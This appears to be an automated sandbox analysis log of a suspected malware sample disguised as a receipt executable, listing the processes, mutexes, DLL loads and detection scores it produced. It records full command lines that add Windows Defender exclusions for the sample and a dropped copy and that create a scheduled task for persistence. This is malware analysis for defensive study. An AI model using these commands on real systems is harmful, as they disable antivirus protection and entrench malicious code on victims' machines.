            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMutant created: \Sessions\1\BaseNamedObjects\jIoPoAuksafzWWog
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2668.tmpJump to behavior
            Source: Receipt-#202431029B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Receipt-#202431029B.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Receipt-#202431029B.exeReversingLabs: Detection: 73%
            Source: Receipt-#202431029B.exeVirustotal: Detection: 43%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile read: C:\Users\user\Desktop\Receipt-#202431029B.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\XetHVID.exe C:\Users\user\AppData\Roaming\XetHVID.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Users\user\AppData\Roaming\XetHVID.exe "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess created: C:\Users\user\AppData\Roaming\XetHVID.exe "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Notepab.lnk.8.drLNK file: ..\..\..\..\..\Notepab.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Receipt-#202431029B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Receipt-#202431029B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Receipt-#202431029B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: \??\C:\Windows\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbyhR source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0 source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WER7DA9.tmp.dmp.20.dr
